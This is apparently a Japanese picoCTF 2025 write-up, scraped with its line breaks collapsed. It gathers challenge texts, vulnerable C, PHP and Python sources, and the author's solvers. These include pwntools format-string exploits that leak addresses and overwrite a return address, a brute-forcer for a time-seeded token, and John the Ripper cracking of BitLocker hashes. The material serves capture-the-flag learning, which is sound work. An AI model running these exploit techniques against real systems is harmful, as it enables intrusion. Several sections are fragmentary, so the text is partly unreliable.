Play this short game to get familiar with terminal applications and some of the most important rules in scope for picoCTF.Connect to the program with netcat:
$ nc verbal-sleep.picoctf.net 64240
正直よくわからないがピコピコしているとフラグが取得できた。
Rust fixme 1 100pts
問題文
Have you heard of Rust? Fix the syntax errors in this Rust file to print the flag!Download the Rust code here.
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh source $HOME/.cargo/en
そして、ファイルを解凍して、解凍先で
┌──(yuma4869㉿yuma4869)-[~/Downloads/ctf/pico/fixme1/fixme1] └─$ cargo build Compiling crossbeam-utils v0.8.20 Compiling rayon-core v1.12.1 Compiling either v1.13.0 Compiling crossbeam-epoch v0.9.18 Compiling crossbeam-deque v0.8.5 Compiling rayon v1.10.0 Compiling xor_cryptor v1.2.3 Compiling rust_proj v0.1.0 (/home/yuma4869/Downloads/ctf/pico/fixme1/fixme1) error: expected `;`, found keyword `let` --> src/main.rs:5:37 | 5 | let key = String::from("CSUCKS") // How do we end statements in Rust? | ^ help: add `;` here ... 8 | let hex_values = ["41", "30", "20", "63", "4a", "45", "54", "76", "01", "1c", "7e", "59", "63", "e1", "61", "... | --- unexpected token
error: argument never used --> src/main.rs:26:9 | 25 | ":?", // How do we print out a variable in the println function? | ---- formatting specifier missing 26 | String::from_utf8_lossy(&decrypted_buffer) | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ argument never used
error[E0425]: cannot find value `ret` in this scope --> src/main.rs:18:9 | 18 | ret; // How do we return in rust? | ^^^ help: a local variable with a similar name exists: `res`
For more information about this error, try `rustc --explain E0425`. error: could not compile `rust_proj` (bin "rust_proj") due to 3 previous errors
AIにソース丸投げしても多分解けると思うけど一つずつ見ていくと、
最初のエラーはセミコロンの付け忘れ
二つ目のエラーはprintlnの文法で、プレースホルダーが必要だが使っていない
最後のエラーはrustはret;ではなくreturn;
これらを直すとフラグが得られる。
Rust fixme 2,3 100pts
疲れたんでLLMに聞いて下さい…
Web Exploitation
Cookie Monster Secret Recipe 50pts
問題文
Cookie Monster has hidden his top-secret cookie recipe somewhere on his website. As an aspiring cookie detective, your mission is to uncover this delectable secret. Can you outsmart Cookie Monster and find the hidden recipe?You can access the Cookie Monster here and good luck
Welcome to the challenge! In this challenge, you will explore a web application and find an endpoint that exposes a file containing a hidden flag.The application is a simple blog website where you can read articles about various topics, including an article about API Documentation. Your goal is to explore the application and find the endpoint that generates files holding the server’s memory, where a secret flag is hidden.The website is running picoCTF News.
A developer has added profile picture upload functionality to a website. However, the implementation is flawed, and it presents an opportunity for you. Your mission, should you choose to accept it, is to navigate to the provided web page and locate the file upload area. Your ultimate goal is to find the hidden flag located in the /root directory.You can access the web application here!
Matching Defaults entries for www-data on challenge: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User www-data may run the following commands on challenge: (ALL) NOPASSWD: ALL
I made a cool website where you can announce whatever you want! Try it out!I heard templating is a cool and modular way to build web apps! Check out my website here!
ABC Bank’s website has a loan calculator to help its clients calculate the amount they pay if they take a loan from the bank. Unfortunately, they are using an eval function to calculate the loan. Bypassing this will give you Remote Code Execution (RCE). Can you exploit the bank’s calculator and read the flag?The website is running Here.
I made a cool website where you can announce whatever you want! I read about input sanitization, so now I remove any kind of characters that could be a problem :)I heard templating is a cool and modular way to build web apps! Check out my website here!
History has failed us, but no matter.Server sourceThere are two flags in this challenge. Submit flag one here, and flag two in Pachinko Revisited.Website
<?phpif(isset($_POST['username'])&&isset($_POST['pwd'])){$username =$_POST['username'];$pwd =$_POST['pwd'];if($username ==$pwd){// ユーザー名とパスワードが同じ場合はエラー出力echobase64_decode("PGJyLz5GYWlsZWQhIE5vIGZsYWcZmc9yIHlvdQ==");// ※「Failed! No flag for you」などのメッセージ}else{if(sha1($username)===sha1($pwd)){// SHA-1ハッシュが一致した場合、上位ディレクトリの flag ファイルの内容を出力echofile_get_contents(base64_decode("Li4vZmxhZy50eHQ="));// これは "../flag.txt" に相当}else{// どちらにも当てはまらない場合はエラー出力echobase64_decode("PGJyLz5GYWlsZWQhIE5vIGZsYWcZmc9yIHlvdQ==");}}}?>
A company stored a secret message on a server which got breached due to the admin using weakly hashed passwords. Can you gain access to the secret stored within the server?Access the server using nc verbal-sleep.picoctf.net 62644
This service provides you an encrypted flag. Can you decrypt it with just N & e?Connect to the program with netcat:$ nc verbal-sleep.picoctf.net 53723The program’s source code can be downloaded here. Hints: 1.How much do we trust randomness? 2.Notice anything interesting about N? 3.Try comparing N across multiple requests
N = 18300720288745826987628969180084863434671700199633270143176607386127713564828715605477128540987346815186431009917196183888943234877095300279572252430472506 [+] Request 10 [x] Opening connection to verbal-sleep.picoctf.net on port 53723 [x] Opening connection to verbal-sleep.picoctf.net on port 53723: Trying 3.138.217.147 [+] Opening connection to verbal-sleep.picoctf.net on port 53723: Done [x] Receiving all data [x] Receiving all data: 0B [x] Receiving all data: 336B [+] Receiving all data: Done (336B) [*] Closed connection to verbal-sleep.picoctf.net port 53723 N = 23518685348862752993530266484691993799813775296163990719688468538973093730697914720868515657965617045605619329543209923027615769148896160870931119808387294 [*] 共通の素因数を発見! Flag: picoCTF{tw0_1$_pr!m33486c703}
Guess My Cheese (Part 1) 200pts
問題文とヒント
Try to decrypt the secret cheese password to prove you’re not the imposter!Connect to the program on our server: nc verbal-sleep.picoctf.net 58847 Hints:Remember that cipher we devised together Squeexy? The one that incorporates your affinity for linear equations???
******************************************* *** Part 1 *** *** The Mystery of the CLONED RAT *** *******************************************
The super evil Dr. Lacktoes Inn Tolerant told me he kidnapped my best friend, Squeexy, and replaced him with an evil clone! You look JUST LIKE SQUEEXY, but I'm not sure if you're him or THE CLONE. I've devised a plan to find out if YOU'RE the REAL SQUEEXY! If you're Squeexy, I'll give you the key to the cloning room so you can maul the imposter...
Here's my secret cheese -- if you're Squeexy, you'll be able to guess it: LZMLWIRDARHAKVCAUYPJWZ Hint: The cheeses are top secret and limited edition, so they might look different from cheeses you're used to! Commands: (g)uess my cheese or (e)ncrypt a cheese What would you like to do?
暗号化されたものが配られ、暗号化するか何を暗号化しているかを当てるかを選べる。
一度eを押して暗号化してみようとしたけど無理だった。
What would you like to do? e
What cheese would you like to encrypt? hello I'm sorry I haven't had that cheese before, so I can't encrypt it!
I don't wanna talk to you too much if you're some suspicious character and not my BFF Squeexy! You have 2 more chances to prove yourself to me!
Commands: (g)uess my cheese or (e)ncrypt a cheese What would you like to do?
Lyrics jump from verses to the refrain kind of like a subroutine call. There’s a hidden refrain this program doesn’t print by default. Can you get it to print it? There might be something in it for you.The program’s source code can be downloaded here.Connect to the program with netcat:$ nc verbal-sleep.picoctf.net 60855
import reimport time# Read in flag from fileflag =open('flag.txt','r').read()secret_intro =\'''Pico warriors rising, puzzles laid bare,Solving each challenge with precision and flair.With unity and skill, flags we deliver,The ether’s ours to conquer, '''\+ flag +'\n'song_flag_hunters = secret_intro +\'''[REFRAIN]We’re flag hunters in the ether, lighting up the grid,No puzzle too dark, no challenge too hid.With every exploit we trigger, every byte we decrypt,We’re chasing that victory, and we’ll never quit.CROWD (Singalong here!);RETURN[VERSE1]Command line wizards, we’re starting it right,Spawning shells in the terminal, hacking all night.Scripts and searches, grep through the void,Every keystroke, we're a cypher's envoy.Brute force the lock or craft that regex,Flag on the horizon, what challenge is next?REFRAIN;Echoes in memory, packets in trace,Digging through the remnants to uncover with haste.Hex and headers, carving out clues,Resurrect the hidden, it's forensics we choose.Disk dumps and packet dumps, follow the trail,Buried deep in the noise, but we will prevail.REFRAIN;Binary sorcerers, let’s tear it apart,Disassemble the code to reveal the dark heart.From opcode to logic, tracing each line,Emulate and break it, this key will be mine.Debugging the maze, and I see through the deceit,Patch it up right, and watch the lock release.REFRAIN;Ciphertext tumbling, breaking the spin,Feistel or AES, we’re destined to win.Frequency, padding, primes on the run,Vigenère, RSA, cracking them for fun.Shift the letters, matrices fall,Decrypt that flag and hear the ether call.REFRAIN;SQL injection, XSS flow,Map the backend out, let the database show.Inspecting each cookie, fiddler in the fight,Capturing requests, push the payload just right.HTML's secrets, backdoors unlocked,In the world wide labyrinth, we’re never lost.REFRAIN;Stack's overflowing, breaking the chain,ROP gadget wizardry, ride it to fame.Heap spray in silence, memory's plight,Race the condition, crash it just right.Shellcode ready, smashing the frame,Control the instruction, flags call my name.REFRAIN;END;'''MAX_LINES =100defreader(song,startLabel): lip =0 start =0 refrain =0 refrain_return =0 finished =False# Get list of lyric lines song_lines = song.splitlines()# Find startLabel, refrain and refrain returnfor i inrange(0, len(song_lines)):if song_lines[i]== startLabel: start = i +1elif song_lines[i]=='[REFRAIN]': refrain = i +1elif song_lines[i]=='RETURN': refrain_return = i# Print lyrics line_count =0 lip = startwhilenot finished and line_count < MAX_LINES: line_count +=1for line in song_lines[lip].split(';'):if line ==''and song_lines[lip]!='':continueif line =='REFRAIN': song_lines[refrain_return]='RETURN '+str(lip +1) lip = refrainelif re.match(r"CROWD.*", line):print(lip) crowd =input('Crowd: ') song_lines[lip]='Crowd: '+ crowd lip +=1elif re.match(r"RETURN [0-9]+", line): lip =int(line.split()[1])elif line =='END': finished =Trueelse:print(line,flush=True) time.sleep(0.5) lip +=1reader(song_flag_hunters,'[VERSE1]')
Echoes in memory, packets in trace, Digging through the remnants to uncover with haste. Hex and headers, carving out clues, Resurrect the hidden, it's forensics we choose. Disk dumps and packet dumps, follow the trail, Buried deep in the noise, but we will prevail.
We’re flag hunters in the ether, lighting up the grid, No puzzle too dark, no challenge too hid. With every exploit we trigger, every byte we decrypt, We’re chasing that victory, and we’ll never quit. Crowd: Pico warriors rising, puzzles laid bare, Solving each challenge with precision and flair. With unity and skill, flags we deliver, The ether’s ours to conquer, picoCTF{70637h3r_f0r3v3r_250bd6ef}
Quantum Scrambler 200pts
問題文
We invented a new cypher that uses “quantum entanglement” to encode the flag. Do you have what it takes to decode it?Connect to the program with netcat:$ nc verbal-sleep.picoctf.net 51316The program’s source code can be downloaded here.
quantum_scrambler.py
Python
import sysdefexit(): sys.exit(0)defscramble(L): A = L i =2while(i <len(A)): A[i-2]+= A.pop(i-1) A[i-1].append(A[:i-2]) i +=1return Ldefget_flag(): flag ="picoCTF{dummy}" flag = flag.strip() hex_flag =[]for c in flag: hex_flag.append([str(hex(ord(c)))])return hex_flagdefmain(): flag =get_flag() cypher =scramble(flag)print(cypher)if __name__ =='__main__':main()
Can you guess the exact token and unlock the hidden flag?Our school relies on tokens to authenticate students. Unfortunately, someone leaked an important file for token generation. Guess the token to get the flag.The access is granted through nc verbal-sleep.picoctf.net 60220.
import randomimport timedefget_random(length): alphabet ="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" random.seed(int(time.time()*1000))# seeding with current time s =""for i inrange(length): s += random.choice(alphabet)return sdefflag():withopen('/flag.txt','r')as picoCTF: content = picoCTF.read()print(content)defmain():print("Welcome to the token generation challenge!")print("Can you guess the token?") token_length =20# the token length token =get_random(token_length)try: n=0while n <50: user_guess =input("\nEnter your guess for the token (or exit):").strip() n+=1if user_guess =="exit":print("Exiting the program...")breakif user_guess == token:print("Congratulations! You found the correct token.")flag()breakelse:print("Sorry, your token does not match. Try again!")if n ==50:print("\nYou exhausted your attempts, Bye!")exceptKeyboardInterrupt:print("\nKeyboard interrupt detected. Exiting the program...")if __name__ =="__main__":main()
トークンを発行していて、そのトークンが一致したらフラグをゲットできる。
トークンはランダムに発行されているように見えるが、シードが時間なので突破できる。
あとは時間をあわせるだけだと思い次のようなソルバーを書きました。
Python
from pwn import*import sysimport timedefget_random(length,seed): alphabet ="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" random.seed(seed) s =""for i inrange(length): s += random.choice(alphabet)return sdefmain(): count =-50whileTrue: io =remote('verbal-sleep.picoctf.net',64041) now = time.time() now *=1000for i inrange(50): token =get_random(20,now + count) count +=1 io.sendline(token) res = io.recvrepeat(0.3).decode()print(res)if"Co"in res:print(res) sys.exit()if __name__ =="__main__":main()
ですが何回やってもうまくいきません。
ここでほかの問題に言っていたのですが戻ってきたときにはチームメイトが解いてくれてました。
何がいけなかったかというと、配布されたソースでは次のようにトークンを生成していました。
Python
defget_random(length): alphabet ="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" random.seed(int(time.time()*1000))# seeding with current time s =""for i inrange(length): s += random.choice(alphabet)return s
from pwn import*import sysdefget_random(length,seed): alphabet ="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" random.seed(seed) s =""for i inrange(length): s += random.choice(alphabet)return sdefmain(): count =-50whileTrue: io =remote('verbal-sleep.picoctf.net',54486) now =int(time.time()*1000)for i inrange(50): token =get_random(20,now + count) count +=1 io.sendline(token) res = io.recvrepeat(0.3).decode()print(res)if"Co"in res:print(res) sys.exit()if __name__ =="__main__":main()
Tap into Hash 200pts
問題文
Can you make sense of this source code file and write a function that will decode the given encrypted file content?Find the encrypted file here. It might be good to analyze source file to get the flag.
I have been learning to use the Windows API to do cool stuff! Can you wake up my program to get the flag?Download the exe here. Unzip the archive with the password picoctf Hints:Frida is an easy-to-install, lightweight binary instrumentation toolkit Try using the CLI tools like frida-trace to auto-generate handlers
A digital ghost has breached my defenses, and my sensitive data has been stolen! 😱💻 Your mission is to uncover how this phantom intruder infiltrated my system and retrieve the hidden flag.To solve this challenge, you’ll need to analyze the provided PCAP file and track down the attack method. The attacker has cleverly concealed his moves in well timely manner. Dive into the network traffic, apply the right filters and show off your forensic prowess and unmask the digital intruder!Find the PCAP file here Network Traffic PCAP file and try to get the flag.
from PIL import Imageimport stepicim = Image.open("image.png")data = stepic.decode(im)print(data)
Bitlocker-1 200pts
問題文
Jacky is not very knowledgable about the best security passwords and used a simple password to encrypt their BitLocker drive. See if you can break through the encryption!Download the disk image here Hints:Hash cracking
... The following hashes were found: $bitlocker$2$16$2b71884a0ef66f0b9de049a82a39d15b$1048576$12$00be8a46ead6da0106000000$60$a28f1a60db3e3fe4049a821c3aea5e4ba1957baea68cd29488c0f3f6efcd4689e43f8ba3120a33048b2ef2c9702e298e4c260743126ec8bd29bc6d58 $bitlocker$3$16$2b71884a0ef66f0b9de049a82a39d15b$1048576$12$00be8a46ead6da0106000000$60$a28f1a60db3e3fe4049a821c3aea5e4ba1957baea68cd29488c0f3f6efcd4689e43f8ba3120a33048b2ef2c9702e298e4c260743126ec8bd29bc6d58 $bitlocker$0$16$cb4809fe9628471a411f8380e0f668db$1048576$12$d04d9c58eed6da010a000000$60$68156e51e53f0a01c076a32ba2b2999afffce8530fbe5d84b4c19ac71f6c79375b87d40c2d871ed2b7b5559d71ba31b6779c6f41412fd6869442d66d $bitlocker$1$16$cb4809fe9628471a411f8380e0f668db$1048576$12$d04d9c58eed6da010a000000$60$68156e51e53f0a01c076a32ba2b2999afffce8530fbe5d84b4c19ac71f6c79375b87d40c2d871ed2b7b5559d71ba31b6779c6f41412fd6869442d66d
抽出したハッシュをbithash.txtに保存した
そして、john the ripperを実行
┌──(yuma4869㉿yuma4869)-[~/Downloads/ctf/pico] └─$ john bithash.txt --wordlist=/usr/share/wordlists/rockyou.txt Note: This format may emit false positives, so it will keep trying even after finding a possible candidate. Using default input encoding: UTF-8 Loaded 2 password hashes with 2 different salts (BitLocker, BitLocker [SHA-256 AES 32/64]) Cost 1 (iteration count) is 1048576 for all loaded hashes Will run 28 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status jacqueline (?) jacqueline (?) 2g 0:00:00:20 0.02% (ETA: 2025-03-21 10:49) 0.09537g/s 128.1p/s 256.3c/s 256.3C/s my3kids..sexy1 Session aborted
Jacky has learnt about the importance of strong passwords and made sure to encrypt the BitLocker drive with a very long and complex password. We managed to capture the RAM while this drive was opened however. See if you can break through the encryption!Download the disk image here and the RAM dump here Hints:Try using a volatility plugin
┌──(yuma4869㉿yuma4869)-[~/Downloads/ctf/pico/bitlocker2] └─$ python2 /usr/local/bin/vol.py -f memdump.mem imageinfo Volatility Foundation Volatility Framework 2.6.1 INFO : volatility.debug : Determining profile based on KDBG search... Suggested Profile(s) : Win10x64_19041 AS Layer1 : SkipDuplicatesAMD64PagedMemory (Kernel AS) AS Layer2 : FileAddressSpace (/home/yuma4869/Downloads/ctf/pico/bitlocker2/memdump.mem) PAE type : No PAE DTB : 0x1ad000L KDBG : 0xf8006340eb20L Number of Processors : 2 Image Type (Service Pack) : 0 KPCR for CPU 0 : 0xfffff800617eb000L KPCR for CPU 1 : 0xffffb98179e67000L KUSER_SHARED_DATA : 0xfffff78000000000L Image date and time : 2025-03-10 02:58:56 UTC+0000 Image local date and time : 2025-03-09 22:58:56 -0400
┌──(yuma4869㉿yuma4869)-[~/Downloads/ctf/pico/bitlocker2] └─$ dislocker -r -V bitlocker-2.dd -k fvek.key -- /media/bitlocker2/ Wed Mar 19 22:55:38 2025 [CRITICAL] None of the provided decryption mean is decrypting the keys. Abort. Wed Mar 19 22:55:38 2025 [CRITICAL] Unable to grab VMK or FVEK. Abort.
Can you try to get the flag? Beware we have PIE!Connect to the program with netcat: The program’s source code can be downloaded here. The binary can be downloaded here.
#include<stdio.h>#include<stdlib.h>#include<signal.h>#include<unistd.h>voidsegfault_handler(){printf("Segfault Occurred, incorrect address.\n");exit(0);}intwin(){ FILE *fptr;char c;printf("You won!\n");// Open file fptr =fopen("flag.txt","r");if(fptr ==NULL){printf("Cannot open file.\n");exit(0);}// Read contents from file c =fgetc(fptr);while(c != EOF){printf("%c", c); c =fgetc(fptr);}printf("\n");fclose(fptr);}intmain(){signal(SIGSEGV, segfault_handler);setvbuf(stdout,NULL, _IONBF,0); // _IONBF = Unbufferedprintf("Address of main: %p\n",&main);unsignedlong val;printf("Enter the address to jump to, ex => 0x12345: ");scanf("%lx",&val);printf("Your input: %lx\n", val);void(*foo)(void)=(void(*)())val;foo();}
Can you try to get the flag? I’m not revealing anything anymore!!Connect to the program with netcat: The program’s source code can be downloaded here. The binary can be downloaded here.
#include<stdio.h>#include<stdlib.h>#include<signal.h>#include<unistd.h>voidsegfault_handler(){printf("Segfault Occurred, incorrect address.\n");exit(0);}voidcall_functions(){charbuffer[64];printf("Enter your name:");fgets(buffer,64, stdin);printf(buffer);unsignedlong val;printf(" enter the address to jump to, ex => 0x12345: ");scanf("%lx",&val);void(*foo)(void)=(void(*)())val;foo();}intwin(){ FILE *fptr;char c;printf("You won!\n");// Open file fptr =fopen("flag.txt","r");if(fptr ==NULL){printf("Cannot open file.\n");exit(0);}// Read contents from file c =fgetc(fptr);while(c != EOF){printf("%c", c); c =fgetc(fptr);}printf("\n");fclose(fptr);}intmain(){signal(SIGSEGV, segfault_handler);setvbuf(stdout,NULL, _IONBF,0); // _IONBF = Unbufferedcall_functions();return0;}
gdb-peda$ b *call_functions+80 Breakpoint 1 at 0x1317 gdb-peda$ r Starting program: /home/yuma4869/Downloads/ctf/pico/pietime2/vuln [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Enter your name:%19$p Warning: 'set logging off', an alias for the command 'set logging enabled', is deprecated. Use 'set logging enabled off'.
from pwn import*io =remote("rescued-float.picoctf.net",60801)io.sendlineafter(b"Enter your name:",b"%19$p")main_ret_addr = io.recvline()win_addr =int(main_ret_addr,16)-0xd3io.sendlineafter(b" enter the address to jump to, ex => 0x12345: ",hex(win_addr).encode())io.interactive()
Here is a binary that has enough privilege to read the content of the flag file but will only let you know its hash. If only it could just give you the actual content!Connect using ssh ctf-player@shape-facility.picoctf.net -p 51683 with the password, redacted and run the binary named “flaghasher”.You can get a copy of the binary if you wish: scp -P 51683 ctf-player@shape-facility.picoctf.net:~/flaghasher .
Here is a binary that has enough privilege to read the content of the flag file but will only let you know its hash. If only it could just give you the actual content!Connect using ssh ctf-player@rescued-float.picoctf.net -p 49722 with the password, redacted and run the binary named “flaghasher”.
The echo valley is a simple function that echoes back whatever you say to it.But how do you make it respond with something more interesting, like a flag?Download the source: valley.cDownload the binary: valleyConnect to the service at nc shape-facility.picoctf.net 50740
翻訳:エコー・バレーは、何を言ってもエコーで返してくれるシンプルな機能だ。 しかし、もっと面白いもの、例えば旗のようなものを返させるにはどうしたらいいのだろう? ソースをダウンロード: valley.c バイナリをダウンロード: valley nc shape-facility.picoctf.net 50740でサービスに接続する。
valley.c
Python
#include <stdio.h>#include <stdlib.h>#include <string.h>void print_flag(){ char buf[32]; FILE *file = fopen("/home/valley/flag.txt","r");if(file == NULL){perror("Failed to open flag file");exit(EXIT_FAILURE);}fgets(buf, sizeof(buf),file);printf("Congrats! Here is your flag: %s", buf);fclose(file);exit(EXIT_SUCCESS);}void echo_valley(){printf("Welcome to the Echo Valley, Try Shouting: \n"); char buf[100];while(1){fflush(stdout);if(fgets(buf, sizeof(buf), stdin)== NULL){printf("\nEOF detected. Exiting...\n");exit(0);}if(strcmp(buf,"exit\n")==0){printf("The Valley Disappears\n");break;}printf("You heard in the distance: ");printf(buf);fflush(stdout);}fflush(stdout);}intmain(){echo_valley();return0;}
┌──(yuma4869㉿yuma4869)-[~/Downloads/ctf/pico/echovalley] └─$ ./valley Welcome to the Echo Valley, Try Shouting: AAAA%p,%p,%p,%p,%p,%p,%p,%p,%p,%p You heard in the distance: AAAA0x7fff7900bed0,(nil),(nil),0x55dfdd19f6d2,0x4,0x252c702541414141,0x2c70252c70252c70,0x70252c70252c7025,0x252c70252c70252c,0xb700000a70
┌──(yuma4869㉿yuma4869)-[~/Downloads/ctf/pico/echovalley] └─$ python solve.py [+] Opening connection to shape-facility.picoctf.net on port 54347: Done [*] stack_write_addr: 0x7fff28ff6078 [*] echo_return_addr: 0x5ba3d5886413 [*] print_flag_addr: 0x5ba3d5886269 /home/yuma4869/.local/lib/python3.13/site-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ISO-8859-1, no guarantees. See https://docs.pwntools.com/#bytes self._log(logging.INFO, message, args, kwargs, 'info') [*] %25193c%11$lln%29471c%12$hn%34331c%13$hnx`ÿ(ÿ\x7f\x00\x00z`ÿ(ÿ\x7f\x00\x00|`ÿ(ÿ\x7f\x00\x00 [+] Receiving all data: Done (50B) [*] Closed connection to shape-facility.picoctf.net port 54347 /home/yuma4869/.local/lib/python3.13/site-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes self._log(logging.INFO, message, args, kwargs, 'info') [*] Here is your flag: picoctf{f1ckl3_f0rmat_f1asc0}
